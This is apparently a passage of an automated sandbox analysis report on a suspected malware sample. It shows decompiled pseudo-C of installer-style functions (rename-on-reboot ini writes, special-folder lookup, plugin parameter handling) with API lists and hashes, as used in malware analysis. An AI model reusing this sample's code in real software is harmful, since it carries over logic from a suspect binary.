					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                                                                                                                                          0x0040100a
                                                                                                                                                                          0x00401039
                                                                                                                                                                          0x00401047
                                                                                                                                                                          0x0040104d
                                                                                                                                                                          0x00401051
                                                                                                                                                                          0x0040105b
                                                                                                                                                                          0x00401061
                                                                                                                                                                          0x00401064
                                                                                                                                                                          0x004010f3
                                                                                                                                                                          0x00401089
                                                                                                                                                                          0x0040108c
                                                                                                                                                                          0x004010a6
                                                                                                                                                                          0x004010bd
                                                                                                                                                                          0x004010cc
                                                                                                                                                                          0x004010cf
                                                                                                                                                                          0x004010d5
                                                                                                                                                                          0x004010d9
                                                                                                                                                                          0x004010e4
                                                                                                                                                                          0x004010ed
                                                                                                                                                                          0x004010ef
                                                                                                                                                                          0x004010ef
                                                                                                                                                                          0x00401100
                                                                                                                                                                          0x00401105
                                                                                                                                                                          0x0040110d
                                                                                                                                                                          0x00401110
                                                                                                                                                                          0x00401112
                                                                                                                                                                          0x00401118
                                                                                                                                                                          0x0040111f
                                                                                                                                                                          0x00401126
                                                                                                                                                                          0x00401130
                                                                                                                                                                          0x00401142
                                                                                                                                                                          0x00401156
                                                                                                                                                                          0x00401160
                                                                                                                                                                          0x00401165
                                                                                                                                                                          0x00401165
                                                                                                                                                                          0x00401110
                                                                                                                                                                          0x0040116e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00401178
                                                                                                                                                                          0x00401010
                                                                                                                                                                          0x00401013
                                                                                                                                                                          0x00401015
                                                                                                                                                                          0x0040101f
                                                                                                                                                                          0x0040101f
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                          • GetClientRect.USER32 ref: 0040105B
                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                          • FillRect.USER32 ref: 004010E4
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                          • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                          • String ID: F
                                                                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                                                                          • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                                                                                                          • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                                                                                                                                          • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                                                                                                          • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00406183, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00406183(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x430908 = 0x55004e;
				 *0x43090c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
						_t53 = _t52 + 0x10;
						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
						_t12 = E0040602D(0x431108, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FE8(_t24 + _t46, 0x430508, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060DF(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040602D(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                                                                                                                          0x00406183
                                                                                                                                                                          0x0040618c
                                                                                                                                                                          0x00406193
                                                                                                                                                                          0x0040619d
                                                                                                                                                                          0x004061b1
                                                                                                                                                                          0x004061d9
                                                                                                                                                                          0x004061e4
                                                                                                                                                                          0x004061e8
                                                                                                                                                                          0x00406208
                                                                                                                                                                          0x0040620f
                                                                                                                                                                          0x00406219
                                                                                                                                                                          0x00406226
                                                                                                                                                                          0x0040622b
                                                                                                                                                                          0x00406230
                                                                                                                                                                          0x00406234
                                                                                                                                                                          0x00406243
                                                                                                                                                                          0x00406245
                                                                                                                                                                          0x00406252
                                                                                                                                                                          0x00406256
                                                                                                                                                                          0x004062f1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040626c
                                                                                                                                                                          0x00406279
                                                                                                                                                                          0x0040629d
                                                                                                                                                                          0x004062a1
                                                                                                                                                                          0x004062c0
                                                                                                                                                                          0x004062c4
                                                                                                                                                                          0x004062c4
                                                                                                                                                                          0x004062c6
                                                                                                                                                                          0x004062cf
                                                                                                                                                                          0x004062da
                                                                                                                                                                          0x004062e5
                                                                                                                                                                          0x004062eb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004062eb
                                                                                                                                                                          0x004062a3
                                                                                                                                                                          0x004062a6
                                                                                                                                                                          0x004062b1
                                                                                                                                                                          0x004062ad
                                                                                                                                                                          0x004062af
                                                                                                                                                                          0x004062b0
                                                                                                                                                                          0x004062b0
                                                                                                                                                                          0x004062b8
                                                                                                                                                                          0x004062ba
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004062ba
                                                                                                                                                                          0x00406284
                                                                                                                                                                          0x0040628a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040628a
                                                                                                                                                                          0x00406256
                                                                                                                                                                          0x00406234
                                                                                                                                                                          0x004061b3
                                                                                                                                                                          0x004061be
                                                                                                                                                                          0x004061c7
                                                                                                                                                                          0x004061cb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004061cb
                                                                                                                                                                          0x004062fc

                                                                                                                                                                          APIs
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                                                                                                                                                                          • GetShortPathNameW.KERNEL32 ref: 004061C7
                                                                                                                                                                            • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                                                                                                            • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                                                                                                          • GetShortPathNameW.KERNEL32 ref: 004061E4
                                                                                                                                                                          • wsprintfA.USER32 ref: 00406202
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                                                                                                                                          • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 004062EB
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                                                                                                                                                            • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\GR8jRQeRUr.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                            • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                          • String ID: %ls=%ls$[Rename]
                                                                                                                                                                          • API String ID: 2171350718-461813615
                                                                                                                                                                          • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                                                                                                          • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                                                                                                                                          • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                                                                                                          • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040657A, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                          			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x433edc - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x434f38 + _t44 * 2;
				_t45 = 0x432ea0;
				_t108 = 0x432ea0;
				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040653D(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x432ea0;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x436000;
								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
							} else {
								E00406484(_t108,  *0x434f08);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004067C4(_t108);
							}
							goto L38;
						}
						if( *0x434f84 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x434f04;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E0040657A(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                                                                                                                                                          0x0040657a
                                                                                                                                                                          0x0040657a
                                                                                                                                                                          0x0040657a
                                                                                                                                                                          0x00406580
                                                                                                                                                                          0x00406585
                                                                                                                                                                          0x00406596
                                                                                                                                                                          0x00406596
                                                                                                                                                                          0x0040659e
                                                                                                                                                                          0x0040659f
                                                                                                                                                                          0x004065a0
                                                                                                                                                                          0x004065a1
                                                                                                                                                                          0x004065a4
                                                                                                                                                                          0x004065ac
                                                                                                                                                                          0x004065ae
                                                                                                                                                                          0x004065bf
                                                                                                                                                                          0x004065c2
                                                                                                                                                                          0x004065c2
                                                                                                                                                                          0x004065c6
                                                                                                                                                                          0x004065cc
                                                                                                                                                                          0x004065cf
                                                                                                                                                                          0x004067aa
                                                                                                                                                                          0x004067aa
                                                                                                                                                                          0x004067b5
                                                                                                                                                                          0x004067c1
                                                                                                                                                                          0x004067c1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004065d5
                                                                                                                                                                          0x004065da
                                                                                                                                                                          0x004065ef
                                                                                                                                                                          0x004065f0
                                                                                                                                                                          0x004065f6
                                                                                                                                                                          0x00406788
                                                                                                                                                                          0x00406796
                                                                                                                                                                          0x00406799
                                                                                                                                                                          0x00406799
                                                                                                                                                                          0x0040678a
                                                                                                                                                                          0x0040678d
                                                                                                                                                                          0x00406790
                                                                                                                                                                          0x00406792
                                                                                                                                                                          0x00406792
                                                                                                                                                                          0x0040679b
                                                                                                                                                                          0x0040679b
                                                                                                                                                                          0x004067a1
                                                                                                                                                                          0x004067a4
                                                                                                                                                                          0x004065d7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004065d7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004067a4
                                                                                                                                                                          0x004065fc
                                                                                                                                                                          0x004065ff
                                                                                                                                                                          0x0040660e
                                                                                                                                                                          0x00406615
                                                                                                                                                                          0x00406621
                                                                                                                                                                          0x00406624
                                                                                                                                                                          0x00406627
                                                                                                                                                                          0x00406628
                                                                                                                                                                          0x0040662d
                                                                                                                                                                          0x00406633
                                                                                                                                                                          0x00406636
                                                                                                                                                                          0x00406639
                                                                                                                                                                          0x0040672c
                                                                                                                                                                          0x00406731
                                                                                                                                                                          0x00406764
                                                                                                                                                                          0x00406769
                                                                                                                                                                          0x0040676e
                                                                                                                                                                          0x00406773
                                                                                                                                                                          0x00406773
                                                                                                                                                                          0x00406778
                                                                                                                                                                          0x0040677e
                                                                                                                                                                          0x00406781
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406781
                                                                                                                                                                          0x00406733
                                                                                                                                                                          0x00406736
                                                                                                                                                                          0x00406739
                                                                                                                                                                          0x0040674e
                                                                                                                                                                          0x00406755
                                                                                                                                                                          0x0040673b
                                                                                                                                                                          0x00406742
                                                                                                                                                                          0x00406742
                                                                                                                                                                          0x0040675d
                                                                                                                                                                          0x00406760
                                                                                                                                                                          0x00406724
                                                                                                                                                                          0x00406725
                                                                                                                                                                          0x00406725
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406760
                                                                                                                                                                          0x00406646
                                                                                                                                                                          0x0040664a
                                                                                                                                                                          0x0040664a
                                                                                                                                                                          0x0040664b
                                                                                                                                                                          0x0040664d
                                                                                                                                                                          0x0040668a
                                                                                                                                                                          0x0040668d
                                                                                                                                                                          0x0040669d
                                                                                                                                                                          0x004066a0
                                                                                                                                                                          0x004066a8
                                                                                                                                                                          0x004066ae
                                                                                                                                                                          0x004066ae
                                                                                                                                                                          0x00406709
                                                                                                                                                                          0x00406709
                                                                                                                                                                          0x0040670b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004066b2
                                                                                                                                                                          0x004066b7
                                                                                                                                                                          0x004066b8
                                                                                                                                                                          0x004066ba
                                                                                                                                                                          0x004066d1
                                                                                                                                                                          0x004066df
                                                                                                                                                                          0x004066e5
                                                                                                                                                                          0x004066e7
                                                                                                                                                                          0x00406705
                                                                                                                                                                          0x00406705
                                                                                                                                                                          0x00406705
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406705
                                                                                                                                                                          0x004066ed
                                                                                                                                                                          0x004066f6
                                                                                                                                                                          0x004066f9
                                                                                                                                                                          0x004066ff
                                                                                                                                                                          0x00406703
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406703
                                                                                                                                                                          0x004066cb
                                                                                                                                                                          0x004066cd
                                                                                                                                                                          0x004066cf
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004066cf
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406709
                                                                                                                                                                          0x00406695
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040664f
                                                                                                                                                                          0x0040666d
                                                                                                                                                                          0x00406676
                                                                                                                                                                          0x00406713
                                                                                                                                                                          0x00406717
                                                                                                                                                                          0x0040671f
                                                                                                                                                                          0x0040671f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406717
                                                                                                                                                                          0x00406680
                                                                                                                                                                          0x0040670d
                                                                                                                                                                          0x00406711
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00406711
                                                                                                                                                                          0x0040664d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004065da

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll,00000000,00000000,00422A37,74E5EA30), ref: 004066A8
                                                                                                                                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                          • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll,00000000), ref: 00406779
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                                                                                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                          • API String ID: 4260037668-3171575009
                                                                                                                                                                          • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                                                                                                                          • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                                                                                                                                          • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                                                                                                                          • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 72E42480, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                          			E72E42480(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed char* _t42;
				signed char* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[0x18];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[0x18] = _t41;
							goto L12;
						} else {
							_t37 = E72E4135A(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E72E412E3();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[8]); // 0x1020
						_t42 = _t13;
						if(_t51[4] >= 0) {
						}
						_t38 =  *_t51 & 0x000000ff;
						_t51[0x1c] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M72E425F8))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E72E413B1(__ebp);
									goto L21;
								case 2:
									 *__edi = E72E413B1(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x72e4506c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x72e4506c, __eax,  *0x72e4506c, 0, 0);
									goto L27;
								case 4:
									__eax = E72E412CC(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E72E413B1(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x72e4506c =  *0x72e45074 + ( *(__esi + 0x18) - 1) *  *0x72e4506c * 2 + 0x18;
									 *__ebx =  *0x72e45074 + ( *(__esi + 0x18) - 1) *  *0x72e4506c * 2 + 0x18;
									asm("cdq");
									__eax = E72E41510(__edx,  *0x72e45074 + ( *(__esi + 0x18) - 1) *  *0x72e4506c * 2 + 0x18, __edx,  *0x72e45074 + ( *(__esi + 0x18) - 1) *  *0x72e4506c * 2);
									goto L27;
							}
						}
					}
					L9:
